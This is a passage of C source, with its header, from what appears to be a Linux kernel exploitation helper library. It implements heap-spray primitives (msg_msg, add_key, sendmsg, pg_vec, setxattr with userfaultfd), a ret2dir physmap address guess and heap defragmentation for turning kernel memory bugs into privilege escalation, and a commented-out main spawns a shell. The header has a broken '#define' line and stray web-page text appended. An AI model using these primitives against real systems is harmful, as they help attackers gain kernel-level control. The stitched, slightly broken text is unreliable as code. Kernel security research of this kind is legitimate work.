	if(unlikely(size) >= 4096) error_out("[-] max size of desc spray is 0x1000");

	payload[0] = 'A';

	for(int i=0; i<num; i++) {
		key_serial_t key;
		rand_str(&desc[size], ksize-size-1);
		key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
		if(key < 0) error_out("add_key failed at idx %d", i);
	}
}

static struct msg_spray_t *msg_spray_once(void *payload, size_t msg_size, u32 num)
{
	int msgqid;
	char *buf;

	// create the message queue id first
	msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
	if(unlikely(msgqid < 0)) error_out("fail to create a System V message queue");

	// prepare msg buffer
	if(payload) buf = payload;
	else {
		buf = alloca(msg_size);
		memset(buf, 'A', msg_size);
	}

	// do spray
	for(int i=0; i<num; i++) {
		if(unlikely(msgsnd(msgqid, buf, msg_size, IPC_NOWAIT) < 0)) {
			error_out("msgsnd failed at idx %d", i);
		}
	}

	// return info about this spray
	struct msg_spray_t *spray = malloc(sizeof(struct msg_spray_t));
	spray->next = NULL;
	spray->msgqid = msgqid;
	spray->payload = payload;
	spray->len = msg_size;
	spray->num = num;
	return spray;
}

struct msg_spray_t *msg_spray(void *payload, size_t msg_size, u32 num)
{
	u32 max_num = msgmnb / (msg_size + 0x30);
	u32 sent = 0;
	struct msg_spray_t *spray = NULL, *tmp_spray;

	// do max number of allocation and then repeat for a new message queue
	while(num > 0) {
		u32 todo = (num >= max_num) ? max_num : num;
		tmp_spray = msg_spray_once(payload, msg_size, todo);
		sent += todo;
		num -= todo;

		// link tmp_spray
		if(!spray) spray = tmp_spray;
		else {
			tmp_spray->next = spray->next;
			spray->next = tmp_spray;
		}
	}
	return spray;
}

struct msg_spray_t *msg_spray_max(void *payload, size_t plen)
{
	size_t size = plen + 0x30;
	u32 max_num = msgmnb / size;
	return msg_spray(payload, plen, max_num);
}

void msg_spray_clean(struct msg_spray_t *spray)
{
	void *buffer = malloc(sizeof(struct msgbuf) + spray->len);
	while(spray) {
		//printf("spray->len: %dn", spray->len);
		//printf("spray->payload: %pn", spray->payload);
		//printf("spray->num: %dn", spray->num);
		//printf("spray->msgqid: %dn", spray->msgqid);
		//printf("spray->next: %pn", spray->next);
		for(int i=0; i<spray->num; i++) {
			if (msgrcv(spray->msgqid, buffer, spray->len, 0, MSG_NOERROR | IPC_NOWAIT) == -1) {
				if(errno != ENOMSG) error_out("[msg_spray_clean]");
			}
		}
		if(msgctl(spray->msgqid, IPC_RMID, NULL)) error_out("fail to remove message queue");
		spray = spray->next;
	}
	//puts("clean done");
}

/* we don't want to spend extra time during defragmentation, so we should
 * allocate message queue ids ahead of time.
 * The difference shouldn't be too much though
 * each allocation takes about 3 microseconds
 * */
void defragment_msg(size_t size, u32 num)
{
	// should be equivalent with the orignal message in terms of heap usage
	size = (size <= 0x30) ? 0x31 : size;

	size_t msg_size = size - 0x30;
	u32 max_num = msgmnb / size;
	u32 sent = 0;

	msg_spray(NULL, msg_size, num);
}

void defragment(size_t size, u32 num)
{
	// we prefer msg_msg to do defragmentation because it does not
	// allocate extra objects
	if(size <= 0x20) defragment_add_key(size, num);
	else defragment_msg(size, num);
}

static void *fault_handling_thread(void *arg)
{
	struct uffd_msg msg;   /* Data read from userfaultfd */
	void *page = NULL;
	struct uffdio_copy uffdio_copy;
	void (*handler)(void *);
	struct pollfd pollfd;
	struct fault_struct *fault = (struct fault_struct *)arg;
	u64 addr;
	int uffd = fault->uffd;
	pthread_detach(pthread_self());

	int found = 0;

	// polling events on uffd
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	if(poll(&pollfd, 1, -1) < 0)// wait forever if no new events
		error_out("polling error");

	dprintf("nfault_handler_thread():n");
	dprintf("POLLIN = %d; POLLERR = %dn",
			(pollfd.revents & POLLIN) != 0,
			(pollfd.revents & POLLERR) != 0);

	// read the pagefault message
	if(read(uffd, &msg, sizeof(msg)) <= 0)
		error_out("fail to read uffd message");

	// sanity check the event type
	if (msg.event != UFFD_EVENT_PAGEFAULT)
		error_out("unexpected event on userfaultfd handling");

	addr = msg.arg.pagefault.address;
	dprintf("    UFFD_EVENT_PAGEFAULT event: ");
	dprintf("flags = %llx; ", msg.arg.pagefault.flags);
	dprintf("address = %llxn", addr);

	// look for registered page handler
	u64 start = (u64)fault->addr;
	if(addr >= start && addr < start + fault->len) {
		page = addr - start + fault->src_page;
		found = 1;
	}
	if(!found)
		error_out("Can't find fault handler for addr 0x%llx", msg.arg.pagefault.address);

	// call the hook
	fault->hook((void *)addr);

	// really handle the page fault
	uffdio_copy.src = (unsigned long) page;
	uffdio_copy.dst = (unsigned long) addr & ~(0x1000-1);
	uffdio_copy.len = 0x1000;
	uffdio_copy.mode = 0;
	uffdio_copy.copy = 0;
	if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
		error_out("ioctl-UFFDIO_COPY");

	// after successfully handle the page fault, sleep forever
	sleep(10000);
}

void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *))
{
	int flags = MAP_PRIVATE | MAP_ANONYMOUS;
	void *addr;
	struct uffdio_register uffdio_register;
	pthread_t tid;
	struct uffdio_api uffdio_api;

	// initialize userfaultfd api
	int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	if(uffd < 0) error_out("fail to call userfaultfd");
	uffdio_api.api = UFFD_API;
	uffdio_api.features = 0;
	if(ioctl(uffd, UFFDIO_API, &uffdio_api) < 0)
		error_out("ioctl UFFDIO_API error");

	// map the page that needs handling
	if(wanted) flags |= MAP_FIXED;
	addr = mmap(wanted, len, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0);
	if(addr < 0 || (wanted && addr != wanted)) error_out("mmap failed");

	// tell the kernel this address needs page handling
	uffdio_register.range.start = (unsigned long) addr;
	uffdio_register.range.len = len;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
		error_out("ioctl UFFDIO_REGISTER error");

	// initialize the fault_struct
	struct fault_struct *fault = malloc(sizeof(struct fault_struct));
	fault->len = len;
	fault->src_page = src_page;
	fault->addr = addr;
	fault->hook = hook;
	fault->next = NULL;
	fault->uffd = uffd;

	// launch the fault handling thread, it will be always sleeping if the api is not used
	if(pthread_create(&tid, NULL, fault_handling_thread, fault))
		error_out("fail to create page fault handling thread");

	return addr;
}

void init_pagefault(void)
{
}

/* Universal Heap Spray */
void init_univ_spray(void)
{
	// create a dummy file
	if(access(UNIV_SPRAY_FILE, F_OK) == 0) unlink(UNIV_SPRAY_FILE);
	int fd = open(UNIV_SPRAY_FILE, O_CREAT);
	if(fd < 0) error_out("fail to create a file for universal heap spray");
	close(fd);
	init_pagefault();
}

static void *univ_spray_func(void *args)
{
	void **args2 = (void **)args;
	struct spray_struct *spray = (struct spray_struct *)args2[0];
	void *addr = args2[1];

	pthread_detach(pthread_self());

	while(!spray->stage);

	syscall(__NR_setxattr, UNIV_SPRAY_FILE, "libexp", addr, spray->len, 0);

	// sleep forever
	sleep(10000);
}

struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *))
{
	void *buffer = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if(buffer < 0) error_out("fail to prepare for universal spray");

	// place payload at correct places
	memcpy(buffer+0x1000-len+1, payload, len-1);
	*(char *)(buffer) = ((char *)payload)[len-1];

	// create struct
	struct spray_struct *spray = malloc(sizeof(struct spray_struct));
	spray->payload = payload;
	spray->len = len;
	spray->num = num;
	spray->stage = 0;

	// register for pagefault
	for(int i=0; i<num; i++) {
		pthread_t tid;

		// map 2 pages, initialize the first page, remap the second page for page faulting
		void *addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
		memcpy(addr, buffer, 0x1000);
		void *addr2 = reg_pagefault(addr+0x1000, buffer, 0x1000, hook);

		// start univ_spray_func thread
		void **args = malloc(sizeof(void *) * 2);
		if(!args) error_out("malloc error");
		args[0] = spray;
		args[1] = addr + 0x1000 - len + 1;
		if(pthread_create(&tid, NULL, univ_spray_func, args))
			error_out("fail to create page fault handling thread");
	}

	return spray;
}

void univ_spray(struct spray_struct *spray)
{
	spray->stage = 1;
	sched_yield();
}

void nonsense(void)
{
	char buf[0x400];
	puts("start of some fake debug message");
	printf("pid: %dn", getpid());
	puts("start of nonsense");
	memset(buf, 0, sizeof(buf));
	for(int i=0; i<10; i++) {
		hex_print(buf, sizeof(buf));
	}
}

static void stress_add_key(size_t size)
{
	char type[] = "user";
	char *desc = alloca(size+1);
	char payload[1];
	key_serial_t keys[0x600];
	memset(desc, 0, size+1);
	payload[0] = 'A';

	// do spray
	for(int i=0; i<sizeof(keys)/sizeof(keys[0]); i++) {
		key_serial_t key;
		rand_str(desc, size-1);
		key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING);
		keys[i] = key;
	}

	// cleanup spray
	keyctl(KEYCTL_REVOKE, KEY_SPEC_THREAD_KEYRING);
}

static void stress_msg(size_t size)
{
	size_t msg_size = size - 0x30;
	struct msg_spray_t *spray = msg_spray(NULL, msg_size, 0x600);
	msg_spray_clean(spray);
}

static void stress_percpu_cache(int cpuid, size_t cache_size)
{
	set_cpu(cpuid);
	if(cache_size <= 0x20) stress_add_key(cache_size);
	else stress_msg(cache_size);
}

void stress_all_caches()
{
#ifdef STRESS
	for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) {
		size_t cache_size = kmalloc_size_array[i];
		for(int cpuid=0; cpuid<cpu_num; cpuid++) {
			// printf("%d %lxn", cpuid, cache_size);
			stress_percpu_cache(cpuid, cache_size);
		}
	}
#endif
}

/*reference: https://www.kernel.org/doc/Documentation/vm/pagemap.txt*/
u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base)
{
	u64 pfn = 0;
	u64 kaddr = 0;
	u64 value = 0;
	u64 present = 0;

	int fd = open("/proc/self/pagemap", O_RDONLY);
	if(fd < 0) error_out("[virt_to_physmap] fail to open /proc/self/pagemap");

	// read the pagemap info about the input virtual address
	lseek(fd, (virt_addr >> PAGE_SHIFT)*sizeof(u64), SEEK_SET);
	read(fd, &value, sizeof(u64));
	// printf("pagemap: %#llxn", value);

	// parse the value
	pfn = value & ((1UL << 55) - 1);
	present = value & (1UL << 63);
	if(present && pfn) { // if page exists and page frame exists
		kaddr = page_offset_base + PAGE_SIZE * (pfn-PFN_MIN);
	}

	close(fd);
	return kaddr;
}

int block_bit_size()
{
	int ret = 0;
	u64 val = mem_size;
	while(val > 0) {
		ret++;
		val >>= 1;
	}
	return ret+1;
}

u64 heap_to_physmap(u64 heap_ptr)
{
	int bits = 64-block_bit_size();
	u64 mask = (~(1UL << bits)) << (64-bits);
	// printf("mask: %#llxn", mask);
	return heap_ptr & mask;
}

void *ret2dir_setup(void *src_page, u64 heap_ptr)
{
	void *kaddr = NULL;
	u64 page_offset_base = heap_to_physmap(heap_ptr);
	printf("offset_base: %#llxn", page_offset_base);
	u64 upper_limit = mem_size & (~(PAGE_SIZE-1));
	// printf("base: %llxn", page_offset_base);
	// printf("mem_size: %llxn", mem_size);
	// printf("ret: %llxn", block_bit_size());

	// // first, see whether we can directly read pagemap
	// kaddr = (void *)virt_to_physmap((u64)src_page, page_offset_base);
	// if(kaddr) return kaddr;

	// we don't have access to pagemap, try to spray the same page again and again
	// we use 1/2 of the memory and hope it lands in the middle of it
	// printf("mem_size: %llxn", mem_size);
	int i = 0;
	for(i=0; i<(upper_limit/PAGE_SIZE)/2; i++) {
		void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
		// printf("addr: %pn", addr);
		memcpy(addr, src_page, PAGE_SIZE);
		// if(i%0x10 == 0) printf("i: %d, %p, %pn", i, addr, virt_to_physmap((u64)addr, 0));
	}

	// now we calculate where our page is, it is
	// version 1: (UPPER_LIMIT - pages_allocated)/2
	kaddr = (void *)(page_offset_base + upper_limit - (i/2)*PAGE_SIZE);
	// version 2: pages_allocated/2 + 0x3000
	// kaddr = (void *)(page_offset_base + (i/2)*PAGE_SIZE) + 0x3000;

	return kaddr;
}

struct sendmsg_spray_t *prepare_sendmsg_spray(u32 fork_num, void *payload, size_t len)
{
	if(len > optmem_max) error_out("object too large!");

	// record the flag first
	int *start_flag = umem_alloc(NULL, 0x1000);
	struct sendmsg_spray_t *spray = malloc(sizeof(struct sendmsg_spray_t));
	spray->start_flag = start_flag;
	spray->ready_proc_num = start_flag+1;

	// prepare payload data
	struct cmsghdr *first;
	first = (struct cmsghdr*)payload;
	first->cmsg_len = len;
	first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
	first->cmsg_type = 0x41414141; // <---- ARBITRARY VALUE
	// hex_print(first, 0x100);

	for(int i=0; i<fork_num; i++) {
		if(!clean_fork()) {
			int ret;

			// initialize unix sockets
			int socks[2];
			ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
			if(ret) error_out("socketpair");

			// set timeout
			struct timeval tv;
			memset(&tv, 0, sizeof(tv));
			ret = setsockopt(socks[1], SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
			if(ret) error_out("setsockopt");

			// block send socket
			char buf[0x100];
			struct iovec iov = {
				.iov_base = buf,
				.iov_len = sizeof(buf),
			};
			struct msghdr mhdr;
			memset(&mhdr, 0, sizeof(mhdr));
			mhdr.msg_iov = &iov;
			mhdr.msg_iovlen = 1;
			while(sendmsg(socks[0], &mhdr, MSG_DONTWAIT) > 0);
			if(errno != EAGAIN) error_out("sendmsg does not block");

			__atomic_fetch_add(spray->ready_proc_num, 1, __ATOMIC_SEQ_CST);
			// puts("block done!");

			while(!*spray->start_flag);

			// prepare spray data
			iov.iov_len = 0x10;
			mhdr.msg_control = payload; // use the ancillary data buffer
			mhdr.msg_controllen = len;

			if(sendmsg(socks[0], &mhdr, 0) < 0) error_out("sendmsg spray error");
			error_out("sendmsg spray does not block");

			sleep(10000);
		}
	}

	// wait for all spray processes to get ready
	while(*spray->ready_proc_num != fork_num);

	return spray;
}

void sendmsg_spray(struct sendmsg_spray_t *spray)
{
	*spray->start_flag = 1;
	sched_yield();
}

void sendmsg_spray_transient(u32 num, void *payload, size_t len)
{
	if(len > optmem_max) error_out("object too large!");

	// prepare sockets
	int socks[2];
	int ret = socketpair(AF_LOCAL, SOCK_DGRAM, 0, socks);
	if(ret) error_out("socketpair");

	// prepare message
	struct msghdr mhdr;
	memset(&mhdr, 0, sizeof(mhdr));
	mhdr.msg_iovlen = 0;
	mhdr.msg_control = payload;
	mhdr.msg_controllen = len;
	mhdr.msg_name = "random"; // invalid address
	mhdr.msg_namelen = 1;

	// do it!
	for(int i=0; i<num; i++) sendmsg(socks[0], &mhdr, MSG_DONTWAIT);

	// cleanup
	close(socks[0]);
	close(socks[1]);
}

static int cpu_idle_cmp(const void *arg1, const void *arg2)
{
	struct cpu_info *info1 = (struct cpu_info *)arg1;
	struct cpu_info *info2 = (struct cpu_info *)arg2;
	return info1->nr_running - info2->nr_running;
}

static void shuffle(void *array, size_t n, size_t size)
{
	char tmp[size];
	char *arr = array;
	size_t stride = size * sizeof(char);

	srand(__rdtsc());
	if(n > 1) {
		for(size_t i=0; i<n-1; i++) {
			size_t rnd = (size_t) rand();
			size_t j = (i+rnd) % n;

			memcpy(tmp, arr + j*stride, size);
			memcpy(arr+j*stride, arr + i*stride, size);
			memcpy(arr+i*stride, tmp, size);
		}
	}
}

void reload_cpu_info(void)
{
	FILE *f = fopen(SCHED_DEBUG_FILE, "r");
	char *line = NULL;
	size_t n = 0;

	if(!f) return;

	// fill up cpu info first
	int cpuid = 0;
	while(!feof(f) && cpuid < cpu_num) {
		char *nr_running_str;
		int ret;
		ret = getline(&line, &n, f);
		if(unlikely(ret < 0)) error_out("reload_cpu_info1");

		if(strncmp(line, "cpu#", 4)) continue;

		ret = getline(&line, &n, f);
		if(unlikely(ret < 0)) error_out("reload_cpu_info2");

		nr_running_str = strstr(line, ": ");
		if(unlikely(nr_running_str == NULL)) error_out("reload_cpu_info3");
		nr_running_str += 2;

		idle_cpus[cpuid].nr_running = atoi(nr_running_str);
		idle_cpus[cpuid].cpuid = cpuid;
		cpuid++;
	}
	fclose(f);

	// shuffle and sort it according to nr_running of the CPUs
	// so that the sorted array does not favor any CPUs
	shuffle(idle_cpus, cpu_num, sizeof(*idle_cpus));
	qsort(idle_cpus, cpu_num, sizeof(*idle_cpus), cpu_idle_cmp);

	//// debug print
	//for(int i=0; i<cpu_num; i++) {
	//	printf("%d: %dn", idle_cpus[i].cpuid, idle_cpus[i].nr_running);
	//}
}

void cleanup_msgs(void)
{
	int msgqid;
	struct msqid_ds ds;
	struct msginfo msginfo;
	int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
	if(maxind < 0) error_out("[msg_info]");

	// printf("cleanup %d msgsn", maxind);

	for(int i=0; i<maxind; i++) {
		int ret;
		msgqid = msgctl(i, MSG_STAT, &ds);
		if(msgqid < 0) continue;
		ret = msgctl(msgqid, IPC_RMID, 0);
		if(ret < 0) error_out("[msg_rmdi]");
	}
}

u64 _safe_read_u64_from_file(char *fname, u64 def_val)
{
	if(access(fname, R_OK)) return def_val;
	return _read_u64_from_file(fname);
}

int pg_vec_spray(void *src_buf, u32 buf_size, u32 num)
{
	if((buf_size & 0xfff) != 0) error_out("[pg_vec_spray] buf_size");

	// remember to run everything in sandbox
	int s = socket(AF_PACKET, SOCK_RAW|SOCK_CLOEXEC, htons(ETH_P_ALL));
	if(s < 0) error_out("[pg_vec_spray] socket");

	struct tpacket_req req;
	req.tp_block_size = buf_size;
	req.tp_block_nr = num;// spray times
	req.tp_frame_size = buf_size;
	req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;
	int ret = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
	if(ret < 0) error_out("[pg_vec_spray] setsockopt");

	struct sockaddr_ll sa;
	memset(&sa, 0, sizeof(sa));
	sa.sll_family = PF_PACKET;
	sa.sll_protocol = htons(ETH_P_ARP);
	sa.sll_ifindex = if_nametoindex("lo");
	sa.sll_hatype = 0;
	sa.sll_pkttype = 0;
	sa.sll_halen = 0;

	memset(&sa, 0, sizeof(sa));
	sa.sll_ifindex = if_nametoindex("lo");
	sa.sll_halen = ETH_ALEN;
	void *addr = mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON|MAP_POPULATE, -1, 0);
	memcpy(addr, src_buf, buf_size);
	for(int i=0; i<num; i++) {
		ret = sendto(s, addr, buf_size, 0, (struct sockaddr *)&sa, sizeof(sa));
		if(ret < 0) error_out("[pg_vec_spray] sendto");
	}
	return s;
}

void setup_pg_vec()
{
	// bring up lo interface
	int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
    struct ifreq req;
    memset(&req, 0, sizeof(req));
    strcpy(req.ifr_name, "lo");
    req.ifr_flags = IFF_UP|IFF_LOOPBACK|IFF_RUNNING;
    int ret = ioctl(fd, SIOCSIFFLAGS, &req);
	if(ret != 0) error_out("[setup_pg_vec] ioctl");
	close(fd);
}

static void __attribute__((constructor)) init(void)
{
	// disable buffering
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);

	// very bad random seed lol
	srand(time(NULL));

	// initialize parameters
	min_cpu_freq = _get_cpu_freq();// KHz
	min_granularity = _get_min_gran();// NS
	msgmnb = _read_u64_from_file(MSGMNB_FILE);// NS
	cpu_num = _get_cpu_num();
	mem_size = _get_mem_size();
	optmem_max = _safe_read_u64_from_file(OPTMEM_MAX_FILE, 0x5000);
	idle_cpus = malloc(cpu_num*sizeof(*idle_cpus));
	reload_cpu_info();

	// calculate the minimal tsc in a minimal time slice:
	// (min_cpu_freq * 10^3) * (min_granularity / 10^9 ) = min_cpu_freq * min_granularity / (10 ^ 6)
	min_slice_tsc = (min_cpu_freq / 1000) * (min_granularity / 1000);

	// initialize cpu_mask
	CPU_ZERO(&cpu_mask);
	for(int i=0; i<cpu_num; i++) CPU_SET(i, &cpu_mask);

	// init urand_fd
	urand_fd = open("/dev/urandom", 0);
	if(unlikely(urand_fd < 0)) error_out("fail to open urandom");

#ifdef STRESS
	sleep(1);
#endif
}

static void __attribute__((destructor)) fini(void)
{
	stress_all_caches();
}

//int main()
//{
//	printf("min_cpu_freq: %lldn", min_cpu_freq);
//	printf("min_granularity: %lldn", min_granularity);
//	printf("min_slice_tsc: %lldn", min_slice_tsc);
//	ts_fence();
//	set_cpu(1);
//	setup_sandbox();
//	system("/bin/sh");
//	while(1);
//}
define u32 unsigned int 
#define u64 unsigned long long
#define i32 int 
#define i64 long long

struct cpu_info {
	int cpuid;
	int nr_running;
};

struct spray_struct {
    void *payload;
    size_t len;
    u32 num;
    int stage;
};

struct msg_spray_t {
	struct msg_spray_t *next;
	int msgqid;
	void *payload;
	size_t len;
	u32 num;
};

struct sendmsg_spray_t {
	int *start_flag;
	int *ready_proc_num;
};

#define likely(x)      __builtin_expect(!!(x), 1) 
#define unlikely(x)    __builtin_expect(!!(x), 0)

#ifndef pid_t
#define pid_t int
#define LIBEXP_PID_T
#endif

void error_out(const char *fmt, ...);
void rand_str(char *dest, size_t length);
int write_file(const char* fname, const char* fmt, ...);
void hex_print(void *addr, size_t len);
pid_t clean_fork(void);
void *umem_alloc(void *addr, size_t size);

void ts_fence(void);
void set_cpu(int);
void unset_cpu(void);
void reload_cpu_info(void);
void setup_sandbox(void);
void anti_swapper(void (*hook)(void));
void suppress_int(void (*hook)(void));

struct msg_spray_t * msg_spray(void *payload, size_t plen, u32 num);
struct msg_spray_t * msg_spray_max(void *payload, size_t plen);
void msg_spray_clean(struct msg_spray_t *);
void add_key_spray_num(void *payload, size_t size, u32 num);
void add_key_desc_spray_num(char *desc, u32 num);
void defragment(size_t size, u32 num);
void init_pagefault(void);
void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *));
void nonsense(void);

void init_univ_spray(void);
struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *));
void univ_spray(struct spray_struct *spray);
void stress_all_caches();
u64 heap_to_physmap(u64 heap_ptr);
void *ret2dir_setup(void *, u64);
struct sendmsg_spray_t *prepare_sendmsg_spray(u32, void *, size_t);
void sendmsg_spray(struct sendmsg_spray_t *);
void sendmsg_spray_transient(u32, void *, size_t);
void cleanup_msgs(void);

int pg_vec_spray(void *src_buf, u32 buf_size, u32 num);
void setup_pg_vec();


#ifdef LIBEXP_PID_T
#undef pid_t
#endif

extern u64 cpu_num;
extern struct cpu_info *idle_cpus;
extern size_t kmalloc_size_array[13];

Demo

?

Get in touch